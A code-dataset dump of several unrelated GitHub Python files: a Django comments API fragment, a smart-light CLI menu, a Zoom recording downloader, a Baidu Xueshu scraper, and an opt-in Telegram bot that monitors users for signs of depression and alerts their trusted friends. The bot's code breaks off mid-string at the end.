comment\n return obj.created_by == request.user.username\n\n\nclass CommentsViewSet(viewsets.ModelViewSet):\n serializer_class = CommentsSerializer\n authentication_classes = [TokenAuthentication]\n\n def get_queryset(self):\n queryset = Comments.objects.all()\n # Get the 'item_id' from the URL query parameters\n item_id = self.request.query_params.get('item_id')\n if item_id:\n queryset = queryset.filter(item_id=item_id)\n return queryset\n\n def get_permissions(self):\n if self.action == 'list' and 'item_id' in self.request.query_params:\n # Allow any user to list comments with item_id\n return [permissions.AllowAny()]\n elif self.action in ['update', 'partial_update', 'destroy']:\n # Allow only the comment's creator to update or delete\n return [IsCommentCreator()]\n elif self.action == 'create':\n # Allow any authenticated user (including admins) to create comments\n return [permissions.IsAuthenticated()]\n return [permissions.IsAuthenticated()]\n\n def perform_create(self, serializer):\n try:\n # Attempt to save the comment with created_by set to the username of the authenticated user\n serializer.save(created_by=self.request.user.username)\n\n self.update_item_average_rating(\n serializer.validated_data['item_id'].id)\n except Exception as e:\n # Handle any exceptions that may occur during the saving process\n return Response({\"message\": f\"An error occurred: {str(e)}\"}, status=status.HTTP_500_INTERNAL_SERVER_ERROR)\n\n def update(self, request, *args, **kwargs):\n partial = kwargs.pop('partial', 
False)\n instance = self.get_object()\n serializer = self.get_serializer(\n instance, data=request.data, partial=partial)\n\n if serializer.is_valid():\n # Only update 'comment' and 'rating' fields\n for attr, value in serializer.validated_data.items():\n if attr in ['comment', 'rating']:\n setattr(instance, attr, value)\n\n item_id = instance.item_id.id # item_id is a ForeignKey\n instance.save()\n self.update_item_average_rating(item_id)\n return Response(serializer.data)\n\n return Response(serializer.errors, status=status.HTTP_400_BAD_REQUEST)\n\n def update_item_average_rating(self, item_id):\n # Calculate and update the average rating for the associated item\n avg_rating = Comments.objects.filter(\n item_id=item_id).aggregate(Avg('rating'))['rating__avg']\n Item.objects.filter(id=item_id).update(rating=avg_rating)\n","repo_name":"thisisankit27/Forganic-Backend","sub_path":"ecommerceBackendAPI/our_product/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":3240,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"7564016569","text":"import inquirer\nimport main\nimport os\n\ndef clear():\n os.system('cls' if os.name == 'nt' else 'clear')\n\ndef mainMenu():\n clear()\n mainMenuChoices = ['All lights', 'Rooms', 'Groups', 'Sensors', 'Bridge', 'Quit']\n questions = [\n inquirer.List('Main menu',\n choices=mainMenuChoices),\n ]\n answer = inquirer.prompt(questions)\n\n if(answer['Main menu'] == 'All lights'):\n allLightsMenu()\n elif(answer['Main menu'] == 'Rooms'):\n NotImplemented\n elif(answer['Main menu'] == 'Groups'):\n NotImplemented\n elif(answer['Main menu'] == 'Sensors'):\n NotImplemented\n elif(answer['Main menu'] == 'Bridge'):\n NotImplemented\n elif(answer['Main menu'] == 'Quit'):\n exit()\n\ndef allLightsMenu():\n clear()\n questions = [\n inquirer.List('AllLightsMenu', choices=['All At Once', 'Pick Lights', 'Go back to Main menu']),\n ]\n answer = inquirer.prompt(questions)\n\n if(answer['AllLightsMenu'] == 'All At Once'):\n allLightsAtOnceMenu()\n elif(answer['AllLightsMenu'] == 'Pick Lights'):\n pickLightsMenu()\n elif(answer['AllLightsMenu'] == 'Go back to Main'):\n mainMenu()\n elif(answer['AllLightsMenu'] == 'Exit'):\n exit()\n\ndef allLightsAtOnceMenu():\n clear()\n questions = [\n inquirer.List('allAtOnce', \n choices=['Turn on', 'Turn off', 'Brightness Control', 'Go back']),\n ]\n answer = inquirer.prompt(questions)\n \n if(answer['allAtOnce'] == 'Turn on'):\n main.lightTurnOn(main.getLightByName(main.getLights()))\n elif(answer['allAtOnce'] == 'Turn off'):\n main.lightTurnOff(main.getLights())\n elif(answer['allAtOnce'] == 'Brightness Control'):\n # brightnessControlMenu()\n NotImplemented\n elif(answer['allAtOnce'] == 'Go back'):\n mainMenu()\n elif(answer['allAtOnce'] == 'Exit'):\n exit()\n \ndef pickLightsMenu():\n clear()\n questions = [\n inquirer.Checkbox('PickLightsMenu',\n 'Select the lights you want to control', choices=main.getAllLightsNames()),\n ]\n\n answers = inquirer.prompt(questions)\n\n lightsControl(answers['PickLightsMenu']) \n\ndef lightsControl(chosenLightNames):\n clear()\n possibleChoices = ['Turn on', 'Turn off', 'Brightness Control']\n if(main.areAllColor(chosenLightNames)):\n possibleChoices.append('Color Control')\n possibleChoices.append('Main menu')\n possibleChoices.append('Exit')\n\n questions = [\n inquirer.List('lightsControl', choices=possibleChoices), \n ]\n answer = inquirer.prompt(questions)\n\n if(answer['lightsControl'] == 'Turn on'):\n 
main.lightTurnOn(main.getLightByName(chosenLightNames))\n elif(answer['lightsControl'] == 'Turn off'):\n main.lightTurnOff(main.getLightByName(chosenLightNames))\n elif(answer['lightsControl'] == 'Brightness Control'):\n # brightnessControlMenu()\n NotImplemented\n elif(answer['lightsControl'] == 'Color Control'):\n #colorControlMenu()\n NotImplemented\n elif(answer['lightsControl'] == 'Main menu'):\n mainMenu()\n elif(answer['lightsControl'] == 'Exit'):\n exit()\n\ndef colorControlMenu():\n NotImplemented\ndef brightnessControlMenu():\n NotImplemented\n\n\n\n\nmainMenu()\n\n","repo_name":"Unintendedsideeffects/Krill","sub_path":"interface.py","file_name":"interface.py","file_ext":"py","file_size_in_byte":3302,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"46794704690","text":"import requests \nimport datetime\n\n# Put your JWT token that you get from https://marketplace.zoom.us/ here. \nJWT = '##########'\n\n# Put your USER ID that you get from the API. \nUSERID = '##########'\n\n\nheaders = {\n\t\t'Authorization': \n\t\t'Bearer {}'.format(JWT),\n\t\t'content-type':\n\t\t'application/json',\n\t}\n\n# Put your own download path here, I used an external hard drive so mine will differ from yours\nPATH = '/Volumes/Ext3/Zoom/'\n\n\n\ndef main():\n\tfor year in range(2018,2022):\n\t\tfor month in range(1,13):\n\t\t\tnext_month = month + 1\n\t\t\tnext_year = year\n\n\t\t\tif month == 12:\n\t\t\t\tnext_month = 1\n\t\t\t\tnext_year = year + 1\n\n\t\t\tstart_date = datetime.datetime(year,month,1)\n\t\t\tnext_date = datetime.datetime(next_year,next_month,1)\n\n\t\t\tget_recording(start_date, next_date)\n\n\ndef get_recording(start_date, next_date):\n\t\n\tdate_string = '%Y-%m-%d'\n\turl = 'https://api.zoom.us/v2/users/{}/recordings?from={}&to={}&page_size=300&'.format(\n\t\t\t\tUSERID,\n\t\t\t\tstart_date.strftime(date_string),\n\t\t\t\tnext_date.strftime(date_string)\n\t\t\t)\n\n\tprint(url)\n\n\tresponse = requests.get(\n\t\turl,\n\t\theaders=headers\n\t)\n\n\tdata = response.json()\n\t# print('page_count: ', data['page_count'])\n\t# print('page_size: ', data['page_size'])\n\t# print(len(data['meetings']))\n\t# print(data['from'])\n\t# print(data['to'])\n\n\tfor meeting in data['meetings']:\n\t\tfor record in meeting['recording_files']:\n\t\t\tif record['status'] != 'completed':\n\t\t\t\tcontinue\n\n\t\t\tdownload_recording(\n\t\t\t\trecord['download_url'], \n\t\t\t\trecord['recording_start'].replace(':','-')\n\t\t\t)\n\n\ndef download_recording(download_url, filename):\n\tprint(download_url)\n\tdownload_access_url = '{}?access_token={}'.format(download_url, JWT)\n\tprint(download_access_url)\n\tresponse = requests.get(download_access_url, stream=True)\n\tlocal_filename = '{}{}.mp4'.format(PATH, filename)\n\n\twith open(local_filename, 'wb') as f:\n\t\tfor chunk in response.iter_content(chunk_size=8192):\n\t\t\tprint (len(chunk))\n\t\t\tf.write(chunk)\n\n\t \nif __name__ == '__main__':\n\tmain()\n\n\n\n\n","repo_name":"StackJonSnowy/lanecu","sub_path":"cloudlink.py","file_name":"cloudlink.py","file_ext":"py","file_size_in_byte":1964,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"2788346502","text":"from bs4 import BeautifulSoup\r\nimport requests\r\nfrom selenium import webdriver\r\nimport json\r\ndef get_url_lists(soup):\r\n #单页面\r\n c_fonts = soup.find_all(\"h3\", class_=\"t c_font\")\r\n url_list=[]\r\n for c_font in c_fonts:\r\n url = \" http://\" + 
c_font.find(\"a\").attrs[\"href\"][2:]\r\n print(url)\r\n url_list.append(url)\r\n return url_list\r\ndef parase_one(url):\r\n result = dict()\r\n content_details = requests.get(url)\r\n soup_new = BeautifulSoup(content_details.text, \"lxml\")\r\n try :\r\n result['title']=''.join(list(soup_new.select('#dtl_l > div > h3 > a')[0].stripped_strings))\r\n result['abstract']=soup_new.find_all(\"p\",class_=\"abstract\")[0].get_text().strip()\r\n result[\"author\"]=soup.find_all(\"p\", class_=\"author_text\")[0].get_text().strip()\r\n keywords=soup_new.find_all(\"p\",class_=\"kw_main\")\r\n if len(keywords) == 0 :\r\n keywords = soup_new.find_all(\"p\", class_=\"kw_main_s\")\r\n result['keywords']=list(keywords[0].stripped_strings)\r\n except IndexError:\r\n return result\r\n\r\n print(result)\r\n\r\n\r\ndef page_url_list(soup, page=0):\r\n print(soup.find_all(\"a\", class_=\"n\")[0][\"href\"])\r\n fir_page = \"http://xueshu.baidu.com\" + soup.find_all(\"a\", class_=\"n\")[0][\"href\"]\r\n url_lists = []\r\n for i in range(page):\r\n next_page = fir_page.replace(\"pn=10\", \"pn={:d}\".format(i * 10))\r\n response = requests.get(next_page)\r\n soup_new = BeautifulSoup(response.text, \"lxml\")\r\n url_lists=url_lists+get_url_lists(soup_new)\r\n\r\n return url_lists\r\ndef driver_open(key_word):\r\n url = \"http://xueshu.baidu.com/\"\r\n driver = webdriver.Chrome(\"D:\\chromedriver_win32\\chromedriver.exe\")\r\n# driver = webdriver.Chrome(\"D:\\\\Program Files\\\\selenium_driver\\\\chromedriver.exe\")\r\n driver.get(url)\r\n # time.sleep(10)\r\n driver.find_element_by_class_name('s_ipt').send_keys(key_word)\r\n # time.sleep(2)\r\n driver.find_element_by_class_name('s_btn_wr').click()\r\n # time.sleep(2)\r\n content = driver.page_source.encode('utf-8')\r\n driver.close()\r\n soup = BeautifulSoup(content, 'lxml')\r\n # with open(\"1.html\",\"w\",encoding=\"utf-8\") as f:\r\n # f.write(str(soup.contents))\r\n # print(soup.contents)\r\n return soup\r\n\r\nsoup=driver_open(\"机器学习\")\r\nurl_lists= page_url_list(soup,3)\r\nwith open(\"url_lists.txt\",\"w\",encoding=\"utf-8\") as f:\r\n for i in url_lists:\r\n f.write(str(i)+\"\\n\")\r\nresult =list()\r\nf= open(\"result.json\",\"w\",encoding=\"utf-8\")\r\nfor url in url_lists:\r\n t = parase_one(url)\r\n print(t)\r\n if t!=None:\r\n result.append(t)\r\njson.dump(result,f)\r\n\r\n","repo_name":"zplovekq/BaiduXueSuSpiderAndSearch","sub_path":"UnioTest.py","file_name":"UnioTest.py","file_ext":"py","file_size_in_byte":2629,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"16917759890","text":"from telegram import ReplyKeyboardMarkup, ReplyKeyboardRemove\nfrom telegram.update import Update\nfrom telegram.utils.promise import Promise\nfrom telegram.ext import (\n Updater, ConversationHandler, CommandHandler, MessageHandler, Filters, RegexHandler,\n Job\n)\nimport logging\nfrom .analyze_photo import analyze_photo\n\nfrom .settings import MIN_FRIEND_COUNT, TOKEN\nimport os\nfrom datetime import timedelta\nfrom api.get_score import browser_history_score_info, twitter_score_info, detect_depression\nfrom .quest import *\nfrom collections import namedtuple\nos.environ.setdefault(\"DJANGO_SETTINGS_MODULE\", \"backend.settings\")\nimport django\ndjango.setup()\nfrom api.models import User\nUrl = namedtuple('Url', ['url', 'ts'])\n\n\ndef correct_username(username):\n if username[0] != '@':\n return '@' + username\n\n\ndef get_urls():\n return [\n Url(\n 
url='https://www.google.es/search?hl=ru&source=hp&ei=yqjLW4bvCYPqrgSNrLL4CA&oq='\n 'i+love+my+mom&q=i+wanna+dance&gs_l='\n 'psy-ab.3..33i160k1l2.78913.95588.0.97926.37.32.4.1.1.0.138.3109.16j15.31.0'\n '....0...1c.1.64.psy-ab..1.35.3014...0j0i22i30k1j0i19k1j0i22i30i19k1j33i22i'\n '29i30k1j33i21k1.0.Qpf975be7AE',\n ts=1540048662161.8308\n ),\n Url(\n url='https://www.google.es/search?hl=ru&source=hp&ei=yqjLW4bvCYPqrgSNrLL4CA&q='\n 'i+love+my+life&oq=i+wanna+dance&gs_l='\n 'psy-ab.3..33i160k1l2.78913.95588.0.97926.37.32.4.1.1.0.138.3109.16j15.31.0'\n '....0...1c.1.64.psy-ab..1.35.3014...0j0i22i30k1j0i19k1j0i22i30i19k1j33i22i'\n '29i30k1j33i21k1.0.Qpf975be7AE',\n ts=1540048662161.8308\n ),\n Url(\n url='https://www.google.es/search?hl=ru&source=hp&ei=yqjLW4bvCYPqrgSNrLL4CA&q='\n 'i+love+my+mom&oq=i+wanna+dance+with+somebody+and+be+happy+I+happy&gs_l='\n 'psy-ab.3..33i160k1l2.78913.95588.0.97926.37.32.4.1.1.0.138.3109.16j15.31.0'\n '....0...1c.1.64.psy-ab..1.35.3014...0j0i22i30k1j0i19k1j0i22i30i19k1j33i22i'\n '29i30k1j33i21k1.0.Qpf975be7AE',\n ts=1540048662161.8308\n ),\n Url(\n url='https://www.charliechaplin.com/it/articles/42-Smile-Lyrics',\n ts=1540148662161.8308\n ),\n Url(url='https://en.wikipedia.org/wiki/Happiness', ts=1540047662161.8308),\n Url(url='https://en.wikipedia.org/wiki/Lions', ts=1540047362161.8308),\n Url(url='https://en.wikipedia.org/wiki/Sadness', ts=1540047962161.8308),\n ]\n\n\nMY_URL = \"https://chrome.google.com/webstore/detail/depression-is-weaker-than/afglhfhcelehgbbhpefplibhgkkjgjck?depressionweakerthan_user_id={}\"\n\n\nlogging.basicConfig(\n format='%(asctime)s - %(name)s - %(levelname)s - %(message)s', level=logging.INFO\n)\nlogger = logging.getLogger(__name__)\n\n\ndef get_all_subscribers(user_id):\n user = User.objects.get(user_id=user_id)\n return [friend.user_id for friend in user.trusted.all() if friend.user_id is not None]\n\n\ndef get_all_subscriptions(user_id):\n user = User.objects.get(user_id=user_id)\n return [friend.user_id for friend in user.user_set.all() if friend.user_id is not None]\n\n\ndef get_user_by_username(username):\n return User.objects.get(username=username)\n\n\ndef get_subscribers_count(user_id):\n return User.objects.get(user_id=user_id).trusted.count()\n\n\nclass Stage:\n @classmethod\n def get_handlers(cls):\n raise NotImplementedError()\n\n\nclass AddFriends(Stage):\n name = \"ADD_FRIENDS\"\n _done = 'Done'\n\n @classmethod\n def get_handlers(cls):\n return [\n RegexHandler('^' + cls._done + '$', cls.done),\n MessageHandler(Filters.text, cls.add_subscriber),\n ]\n\n @staticmethod\n def add_friend(friend_username, bot, update):\n user = update.message.from_user\n friend_username = correct_username(friend_username)\n logger.info('User {} want to add friend {}'.format(user.id, friend_username))\n friend = User.objects.filter(username=friend_username).first()\n if friend is None:\n friend = User(username=friend_username)\n friend.save()\n if friend.user_id is None:\n update.message.reply_text(\n (\"I don't know {} yet. Please share link \"\n \"t.me/depression_weaker_than_tech_bot with them. \"\n \"When they register, I will be able to notify them of your status\").format(friend_username)\n )\n logger.info('Not found friend with username: {}'.format(friend_username))\n else:\n add_friend_message = (\n 'User {} has added you to their list of trusted friends. 
'\n 'Now I will drop you a message should they need your attention and care'\n )\n bot.send_message(\n friend.user_id,\n add_friend_message.format(user.name)\n )\n update.message.reply_text(\n 'User {} was added to list of your trusted friends.'.format(friend_username)\n )\n\n logger.info('Found friend id: ' + str(friend.user_id))\n User.objects.get(user_id=user.id).trusted.add(friend)\n return True\n\n @classmethod\n def add_subscriber(cls, bot, update):\n friend_username = update.message.text\n if not AddFriends.add_friend(friend_username, bot, update):\n return AddFriends.name\n\n user_id = update.message.from_user.id\n curr_friends_count = get_subscribers_count(user_id)\n\n if curr_friends_count >= MIN_FRIEND_COUNT:\n reply_markup = ReplyKeyboardMarkup([[cls._done]], one_time_keyboard=True)\n update.message.reply_text(\n ('If you wish, you can now add more friends. '\n 'When you are finished, press \"Done\" button. '\n 'You will also be able to add more friends later.').format(friend_username),\n reply_markup=reply_markup\n )\n else:\n update.message.reply_text(\n 'Good! Now I know {} your friend(s). '.format(curr_friends_count) +\n 'Tell me more friends!'\n )\n return cls.name\n\n @classmethod\n def done(cls, bot, update):\n update.message.reply_text(\n 'To help me monitor your browsing habits, please add my Chrome extention:\\n' +\n MY_URL.format(update.message.from_user.id) + '\\n'\n \"Don't worry, I will not gather any information except for aggregated numerical \"\n \"statistics. Sites you visit or any other sensitive data is not stored.\",\n reply_markup=ReplyKeyboardMarkup(\n [[AddExtention.agree_message]], one_time_keyboard=True\n )\n )\n\n return AddExtention.name\n\n\nclass AddExtention(Stage):\n name = \"ADD_EXTENTION\"\n agree_message = \"I have installed the extention!\"\n\n @classmethod\n def get_handlers(cls):\n return [\n RegexHandler('^' + cls.agree_message + '$', cls.done)\n ]\n\n @classmethod\n def done(cls, bot, update):\n update.message.reply_text(\n 'Great! Could you tell me your Twitter username? '\n 'I will calculate statistics based on your posts and likes.'\n 'If you don\\'t use Twitter or don\\'t want to share it with me, '\n 'just press \"' + AddTwitter.skip_message + '\".',\n reply_markup=ReplyKeyboardMarkup([[AddTwitter.skip_message]], one_time_keyboard=True)\n )\n user_object = User.objects.get(user_id=update.message.from_user.id)\n urls = user_object.url_set.order_by(\"-ts\")\n # urls = get_urls()\n result = browser_history_score_info(urls)\n logger.info('Got user {} browser history, stats: {}'.format(user_object.username, result))\n user_object.url_week_score = result['avg_week_score'][-1]\n user_object.url_month_score = result['avg_month_score']\n user_object.save()\n return AddTwitter.name\n\n\nclass AddTwitter(Stage):\n name = \"ADD_TWITTER\"\n skip_message = 'Skip'\n end_message = (\n \"That's all for now, thanks! 
I will monitor your activity and ping your friends if I think you need extra care.\"\n )\n\n\n @classmethod\n def get_handlers(cls):\n return [\n RegexHandler('^' + cls.skip_message + '$', cls.skip),\n MessageHandler(Filters.text, cls.enter_twitter_login),\n ]\n\n @classmethod\n def skip(cls, bot, update):\n update.message.reply_text(cls.end_message)\n user_id = update.message.from_user.id\n user = User.objects.filter(user_id=user_id).first()\n if not user.activated:\n logger.info('Run monitorings for user with id=' + str(user_id))\n Job(\n Controller.ask_for_photo, interval=timedelta(0, 40),\n context={'user_id': user_id}\n ).run(bot)\n Job(Controller.grab_stat, interval=timedelta(1), context={'user_id': user_id}).run(bot)\n user.activated = True\n user.save()\n return ConversationHandler.END\n\n @classmethod\n def enter_twitter_login(cls, bot, update):\n user_id = update.message.from_user.id\n login = update.message.text\n user = User.objects.filter(user_id=user_id).first()\n user.twitter_login = login\n user.save()\n logger.info('User {} add twitter login {}'.format(user.username, login))\n res = twitter_score_info(login)\n user.twitter_month_score = res['avg_month_score']\n user.twitter_week_score = res['avg_week_score'][-1]\n user.save()\n logger.info('Got twitter depression score of user {}: {}'.format(user.username, res))\n update.message.reply_text(cls.end_message, reply_markup=ReplyKeyboardRemove())\n if not user.activated:\n logger.info('Run monitorings for user with id=' + str(user_id))\n Job(\n Controller.ask_for_photo, interval=timedelta(0, 40),\n context={'user_id': user_id}\n ).run(bot)\n Job(Controller.grab_stat, interval=timedelta(1), context={'user_id': user_id}).run(bot)\n user.activated = True\n user.save()\n return ConversationHandler.END\n\n\nclass Controller:\n DEPRESSED = \"/i_m_depressed\"\n ADD_FRIEND = '/add_friend'\n HELP = '/help'\n REGISTER = '/register'\n QUEST = '/quest'\n FRIEND_LIST = '/friend_list'\n REMOVE_FRIEND = '/remove_friend'\n FRIEND_TO = '/friend_to_list'\n\n STATE = {\n }\n\n @classmethod\n def run_bot(cls):\n cls._updater = Updater(TOKEN)\n dispatcher = cls._updater.dispatcher\n\n meeting_conversation_stages = [AddFriends, AddExtention, AddTwitter, ]\n meeting_conversation_handler = ConversationHandler(\n entry_points=[CommandHandler('register', cls.register)],\n states={stage.name: stage.get_handlers() for stage in meeting_conversation_stages},\n fallbacks=[],\n )\n dispatcher.add_handler(meeting_conversation_handler)\n\n quest_conversation_handler = ConversationHandler(\n entry_points=[CommandHandler('quest', cls.start_quest)],\n states={\"select\": [MessageHandler(Filters.text, cls.select_perspective)], \"quest\": [MessageHandler(Filters.text, cls.quest)]},\n fallbacks=[],\n )\n dispatcher.add_handler(quest_conversation_handler)\n\n dispatcher.add_handler(CommandHandler('start', cls.start_meeting))\n dispatcher.add_handler(CommandHandler(\n cls.DEPRESSED[1:],\n lambda bot, update: cls.notify_friends_about_depression(update.message.from_user.id)\n ))\n dispatcher.add_handler(CommandHandler(cls.HELP[1:], cls.print_help))\n dispatcher.add_handler(CommandHandler(cls.ADD_FRIEND[1:], cls.add_friend))\n dispatcher.add_handler(CommandHandler(cls.REMOVE_FRIEND[1:], cls.remove_friend))\n dispatcher.add_handler(CommandHandler(cls.FRIEND_TO[1:], cls.friend_to))\n dispatcher.add_handler(CommandHandler(cls.FRIEND_LIST[1:], cls.friend_list))\n dispatcher.add_handler(MessageHandler(Filters.photo, cls.analyze_photo))\n 
dispatcher.add_handler(CommandHandler('_grab_stat', cls.grab_stat))\n\n bot = cls.get_bot()\n for user_object in User.objects.all():\n if not user_object.activated:\n continue\n user_id = user_object.user_id\n logger.info('Run monitorings for user with id=' + str(user_id))\n Job(\n cls.ask_for_photo, interval=timedelta(0, 40),\n context={'user_id': user_id}\n ).run(bot)\n Job(cls.grab_stat, interval=timedelta(1), context={'user_id': user_id}).run(bot)\n\n cls._updater.start_polling()\n cls._updater.idle()\n\n @classmethod\n def start_meeting(cls, bot, update):\n user = User.objects.filter(username=update.message.from_user.name).first()\n if not user:\n user = User(username=update.message.from_user.name)\n user.user_id = update.message.from_user.id\n user.save()\n\n update.message.reply_text('Hi!')\n\n update.message.reply_text(\n \"I can help self-diagnose and fight mild cases of depression \"\n \"by informing your friends that you need care.\\n\"\n \"You can learn more about me here: http://depressionweakerthan.tech. \\n\"\n \"If you want, you can just lurk and recieve notifications about your friends' statuses. \"\n \"However, I strongly recommend you to add trusted friends and install my browser extension. \"\n \"It is a good idea to take care of yourself even if you don't think you could ever get depressed.\\n\"\n )\n\n subscriptions = get_all_subscriptions(update.message.from_user.id)\n for subscription in subscriptions:\n update.message.reply_text(\n 'User {} has added you as trusted friend'.format(cls.get_username(subscription))\n )\n update.message.reply_text(\"Type /help to get a list of all avaliable commands.\")\n\n @classmethod\n def get_bot(cls):\n if getattr(cls, '_updater', None) is None:\n cls._updater = Updater(TOKEN)\n return cls._updater.bot\n\n @classmethod\n def get_username(cls, user_id):\n bot = cls.get_bot()\n return bot.get_chat_member(user_id, user_id).user.name\n\n @classmethod\n def depression_detected(cls, user_id):\n cls.notify_friends_about_depression(user_id)\n cls.notify_user_about_depression(user_id)\n\n @classmethod\n def notify_user_about_depression(cls, user_id):\n bot = cls.get_bot()\n bot.send_message(\n user_id,\n \"I'm worring about your recent Internet activity. \"\n \"Honestly, I think you are a little bit depressed! :(\\n\"\n \"Try to relax and talk to your friends about your feelings. I hope, you will cheer up!\"\n )\n\n @classmethod\n def notify_friends_about_depression(cls, user_id):\n bot = cls.get_bot()\n username = cls.get_username(user_id)\n for subscriber in get_all_subscribers(user_id):\n bot.send_message(\n subscriber,\n 'I noticed that your friend, ' + username +\n ', is feeling a little bit unhappy lately. '\n 'You should talk to them and ask about their feelings.'\n )\n\n @classmethod\n def print_help(cls, bot, update):\n update.message.reply_text(\n 'Type ' + cls.HELP + ' to get help (prints this message).\\n'\n 'Type ' + cls.QUEST + ' to play my small game about depression.\\n'\n 'Type /register to allow me monitor your mental wellness, if you have not already.\\n'\n 'Type ' + cls.DEPRESSED + ' to tell your freinds that your is depressed.\\n'\n 'Type \"' + cls.ADD_FRIEND + ' @friend_username\" to add person with username '\n '@friend_username to your friends. He or she will be notified if I somehow '\n 'realize that you are depressed.\\n'\n 'Also you can send me your photo. 
It also'\n ' helps me to predict whether you depressed or not.\\n'\n )\n\n @classmethod\n def analyze_photo(cls, bot, update):\n photo_file = bot.get_file(update.message.photo[-1].file_id)\n user = update.message.from_user\n photo_file_name = '{}_photo.jpg'.format(user.name)\n photo_file.download(photo_file_name)\n logger.info(\"Photo of user %s was downloaded: %s\", user.name, photo_file_name)\n try:\n scores = analyze_photo(photo_file_name)\n except ValueError as e:\n update.message.reply_text(\"I can't find any face on this photo :(\")\n return\n logger.info(photo_file_name + ' scores: ' + str(scores))\n if scores['sadness'] > 0.5:\n cls.notify_friends_about_depression(user.id)\n update.message.reply_text(\n \"Not the greatest day, is it? Anyway, keep your chin up! \"\n \"Waiting for the next photo :)\"\n )\n else:\n update.message.reply_text('Nice photo! Now I\\'m looking forward for the next one :)')\n\n @classmethod\n def add_friend(cls, bot, update):\n splited_message = update.message.text.split(maxsplit=1)\n if len(splited_message) < 2:\n update.message.reply_text(\n 'You should pass to this command your friend username, like this:\\n' +\n cls.ADD_FRIEND + ' @friend_username'\n )\n else:\n friend_username = splited_message[1]\n AddFriends.add_friend(friend_username, bot, update)\n\n @classmethod\n def ask_for_photo(cls, bot, job):\n user_id = job.context['user_id']\n logger.info('Send photo request to user with id=' + str(user_id))\n bot.send_message(user_id, 'Send me a photo, please!')\n\n @classmethod\n def register(cls, bot, update):\n update.message.reply_text(\n \"Now you can tell me username of a person whom you trust. \"\n \"They will be notified if you ever get depressed. \"\n \"You can add any number of friends, but enter one username at a time. \"\n )\n\n return AddFriends.name\n\n @classmethod\n def start_quest(cls, bot, update):\n game = Game()\n cls.STATE[update.message.from_user.id] = game\n update.message.reply_text(game.start(), reply_markup=ReplyKeyboardMarkup([[\"Healthy\"], [\"Depressive\"]], one_time_keyboard=True))\n return \"select\"\n\n @classmethod\n def select_perspective(cls, bot, update):\n desc = cls.STATE[update.message.from_user.id].select_perspective(update.message.text)\n update.message.reply_text(\"Let's start the game\")\n update.message.reply_text(desc)\n update.message.reply_text(\"Select, where you want to spend next couple of hours\",\n reply_markup=ReplyKeyboardMarkup([[\"Bed\"], [\"Kitchen\"], [\"School\"]], one_time_keyboard=True))\n return \"quest\"\n\n @classmethod\n def quest(cls, bot, update):\n desc = cls.STATE[update.message.from_user.id].take_move(update.message.text)\n game = cls.STATE[update.message.from_user.id]\n if cls.STATE[update.message.from_user.id].time == 3:\n update.message.reply_text(desc)\n if game.finished:\n update.message.reply_text(\"Thank you for playing! You can see now that depression can affect your state. You should register now to get help when you need it.\")\n return -1\n else:\n update.message.reply_text(\"Thats all! 
Now it is time to live the same day from the other perspective.\")\n game.finished = 1\n game.state = \"Bed\"\n game.time = 0\n game.positive = not game.positive\n update.message.reply_text(game.get_description())\n update.message.reply_text(\"Select, where you want to spend next couple of hours\",\n reply_markup=ReplyKeyboardMarkup([[\"Bed\"], [\"Kitchen\"], [\"School\"]], one_time_keyboard=True))\n return \"quest\"\n\n @classmethod\n def grab_stat(cls, bot, job_or_update):\n if isinstance(job_or_update, Job):\n user_id = job_or_update.context['user_id']\n elif isinstance(job_or_update, Update):\n user_id = job_or_update.message.from_user.id\n else:\n raise ValueError('job_or_update should be Updater or Job')\n user = User.objects.filter(user_id=user_id).first()\n login = user.twitter_login\n if login is not None:\n today_twitter_score = twitter_score_info(login, deep_days=1)['avg_month_score']\n user.twitter_month_score *= 29.0 / 30.0\n user.twitter_month_score += today_twitter_score / 30.0\n user.twitter_week_score *= 6.0 / 7.0\n user.twitter_week_score += today_twitter_score / 7.0\n\n urls = user.url_set.order_by(\"-ts\")\n # urls = get_urls()\n today_url_score = browser_history_score_info(urls, deep_days=1)['avg_month_score']\n user.url_month_score *= 29.0 / 30.0\n user.url_month_score += today_url_score / 30.0\n user.url_week_score *= 6.0 / 7.0\n user.url_week_score += today_url_score / 7.0\n\n user.save()\n logger.info('Got stat for user ' + user.username)\n is_depressed = detect_depression(\n user.url_month_score, user.url_week_score,\n user.twitter_month_score, user.twitter_week_score\n )\n if isinstance(job_or_update, Update):\n job_or_update.message.reply_text((\"Here is some stats about you:\\n\"\n \"Browsing score: {} this month, {} this week\\n\"\n \"Twitter score: {} this month, {} this week\").format(\n user.url_month_score, user.url_week_score,\n user.twitter_month_score or 0, user.twitter_week_score or 0))\n if is_depressed:\n logger.info('User {} is depressed'.format(user.username))\n cls.depression_detected(user_id)\n\n @classmethod\n def friend_to(cls, bot, update):\n user_id = update.message.from_user.id\n user = User.objects.get(user_id=user_id)\n update.message.reply_text((\n \"These users chose you as friend:\\n\" +\n \", \".join([\n friend.username for friend in user.user_set.all()\n ])\n ))\n\n @classmethod\n def friend_list(cls, bot, update):\n user_id = update.message.from_user.id\n user = User.objects.get(user_id=user_id)\n update.message.reply_text((\n \"Your friends are:\\n\" +\n \", \".join([\n friend.username for friend in user.trusted.all()\n ])\n ))\n\n @classmethod\n def remove_friend(cls, bot, update):\n friend_username = update.message.text.split(maxsplit=1)[1]\n friend_username = correct_username(friend_username)\n user_object = User.objects.get(user_id=update.message.from_user.id)\n try:\n friend = user_object.trusted.get(username=friend_username)\n except User.DoesNotExist as e:\n friend = None\n if friend is None:\n update.message.reply_text(\n 'Sorry, you don\\'t have {} in the friend list'.format(friend_username)\n )\n else:\n user_object.trusted.remove(friend)\n update.message.reply_text(\n 'I removed {} from your friend list'.format(friend_username)\n )\n if friend.user_id is not None:\n bot.send_message(\n friend.user_id,\n '{} asked me to delete you, from his or her friend list. 
